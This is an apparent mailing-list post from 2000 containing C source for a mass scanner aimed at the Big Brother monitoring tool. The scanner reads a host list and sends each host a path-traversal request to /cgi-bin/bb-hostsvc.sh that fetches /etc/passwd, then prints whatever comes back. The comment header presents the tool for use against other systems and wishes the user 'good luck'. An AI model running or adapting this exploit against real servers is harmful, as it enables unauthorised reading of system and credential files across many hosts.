Big Brother Vulnarability Scanner

[safety () LINUXMAIL ORG (Marcus Danielsson)]

/* 
 *
 *      2000-07-11 
 *        
 *      Ripped from  phfscan.c 
 *      Big Brother Vulnarability scanner.
 *      Scans for /cgi-bin/bb-hostsvc.sh.
 *      If it exists you might be able to read files from
 *      the system. Good luck.
 *
 *       
 *       Author:  Safety@IRCnet who also discovered the bug.
 *                Safety () LinuxMail ORG
 *
 *
 *       Credits: #roothat, #vastervik, #smile, Loki,
crimson, self,
 *                Bjurr, Metoo, and everyone else who think
they should
 *                be on this list.
 *      
 *       Special Thanks goes to Loki who are going to host and
design 
 *       my homepage.
 * 
 *
 *       Usage:
 *
 *       ./bbscan < hostlist > outputfile
 *
 */

#include <sys/stat.h>
#include <sys/types.h>
#include <termios.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/syslog.h>
#include <sys/param.h>
#include <sys/times.h>
#ifdef LINUX
#include <sys/time.h>
#endif
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/signal.h>
#include <arpa/inet.h>
#include <netdb.h>

int FLAG = 1;
int Call(int signo)
{
 FLAG = 0;
}

main (int argc, char *argv[])
{
  char host[100], buffer[1024], hosta[1024],FileBuf[8097];
  int outsocket, serv_len, len,X,c,outfd;
  struct hostent *nametocheck;
  struct sockaddr_in serv_addr;
  struct in_addr outgoing;

  char bbvuln[]="GET
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd\n\n";

  while(fgets(hosta,100,stdin))
    {
      if(hosta[0] == '\0')
        break;
      hosta[strlen(hosta) -1] = '\0';
      write(1,hosta,strlen(hosta)*sizeof(char));
        write(1,"\n",sizeof(char));
      outsocket = socket (AF_INET, SOCK_STREAM, 0);
      memset (&serv_addr, 0, sizeof (serv_addr));
      serv_addr.sin_family = AF_INET;
     
      nametocheck = gethostbyname (hosta);

      /* Ugly stuff to get host name into inet_ntoa form */
      (void *) memcpy (&outgoing.s_addr,
nametocheck->h_addr_list[0],
                       sizeof (outgoing.s_addr));
      strncpy(host, inet_ntoa (outgoing), 100);
      serv_addr.sin_addr.s_addr = inet_addr (host);
      serv_addr.sin_port = htons (80);
      signal(SIGALRM,Call);
      FLAG = 1;

      alarm(10);    

      X=connect (outsocket, (struct sockaddr *) &serv_addr,
sizeof (serv_addr));
      alarm(0);

      if(FLAG == 1 && X==0){
       write(outsocket,bbvuln,strlen(bbvuln)*sizeof(char));
       while((X=read(outsocket,FileBuf,8096))!=0)
          write(1,FileBuf,X);
        }
      close (outsocket);   
    }
  return 0;
}